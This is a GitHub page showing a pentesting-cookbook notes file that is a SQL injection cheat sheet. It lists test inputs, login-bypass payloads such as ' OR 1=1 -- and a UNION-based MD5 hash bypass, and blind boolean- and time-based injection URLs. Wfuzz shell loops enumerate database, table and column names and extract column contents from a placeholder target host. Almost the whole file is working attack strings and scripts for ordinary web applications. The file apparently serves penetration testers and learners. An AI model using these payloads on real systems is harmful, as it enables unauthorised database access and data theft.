forked from tasooshi/pentesting-cookbook
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathServices.SQL.Notes.txt
More file actions
83 lines (53 loc) · 5.32 KB
/
Copy pathServices.SQL.Notes.txt
File metadata and controls
83 lines (53 loc) · 5.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
██ Tests
# product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1
# product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Bo' || 'ok (OM)
██ Bypasses
- ' OR 1=1 --
- ' OR 1=1 LIMIT 1 --
- ' OR 1=1 LIMIT 1#
- ' OR 1=1#
- ' OR 1=1--
- ' OR 1=1/*
- ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
- ') OR '1'='1--
- ') OR ('1'='1--
- 'OR 1#
- admin' #
- admin' --
- admin' AND 1=0 UNION ALL SELECT 'admin', '81dc...ed055' # MD5 hash bypass, MD5(1234)
- admin' OR 'a'='a
- admin' OR 1=1 --+
- admin' OR 1=1 LIMIT 1;#
- admin' OR 1=1;#
- admin'/*
██ Blind attacks
[ Source: https://github.com/ihack4falafel/OSCP/blob/master/Documents/SQL%20Injection%20Cheatsheet.md ]
▒▒ Logical operators
http://VAR_TARGET_HOST/index.php?id=<true value>' and sleep(1) #
http://VAR_TARGET_HOST/index.php?id=<false value>' or sleep(1) #
▒▒ Database name with boolean-based blind SQL injection with substr()
http://VAR_TARGET_HOST/index.php?id=1' and (substr(database(),<offset>,<character length>))='<character>' --+
▒▒ Database name with boolean-based blind SQL injection by observing http response size with combination of substr() and wfuzz, assuming database name does not include special characters
for i in $(seq 1 10); do wfuzz -c -z list,a-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t-u-v-w-x-y-z --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (substr(database(),$i,1))='FUZZ' --+";done
▒▒ Database name with boolean-based blind SQL injection by observing http response size with substr(), ascii() and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (ascii(substr(database(),$i,1)))=FUZZ --+";done
▒▒ Table name with boolean-based blind SQL injection by observing http response size with substr(), ascii(), and wfuzz.The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),$i,1)))=FUZZ --+";done ## increment limit first argument by 1 to get the next available table name
▒▒ Column name with boolean blind-based SQL injection by observing http response size with substr(), ascii(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name=<table name> limit 0,1),$i,1)))=FUZZ --+";done ## increment limit first argument by 1 to get the next available column name
▒▒ Confirm time-based blind SQL injection using sleep() function
http://VAR_TARGET_HOST/index.php?id=1' and sleep(10) --+
▒▒ Database version with time-based blind SQL injection using sleep(), like"", and conditional if, assuming the back-end database is running version 5
http://VAR_TARGET_HOST/index.php?id=1' and if((select version()) like "5%", sleep(10), null) --+
▒▒ Database name with time-based blind SQL injection by observing http response time with substr(), ascii(), and wfuzz.The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if((ascii(substr(database(),$i,1)))=FUZZ, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt>
▒▒ Table name with time-based blind SQL injection by observing http response time with substr(), ascii(), if, and wfuzz.The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if((select ascii(substr(table_name,$i,1))from information_schema.tables where table_schema=database() limit 0,1)=FUZZ, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt> ## increment limit first argument by 1 to get the next available table name
▒▒ Column name with time-based blind SQL injection by observing http response time with substr(), ascii(), if, and wfuzz.The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if((select ascii(substr(column_name,$i,1))from information_schema.columns where table_name='<table name>' limit 0,1)=FUZZ, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt> ## increment limit first argument by 1 to get the next available column name
▒▒ Extract column content with time-based blind SQL injection by observing http response time with substr(), ascii(), if, and wfuzz.The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,0-10 -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if(ascii(substr((select <column name> from <table name> limit FUZZ,1),$i,1))=FUZ2Z, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt> ## change <column name> to get the content of next column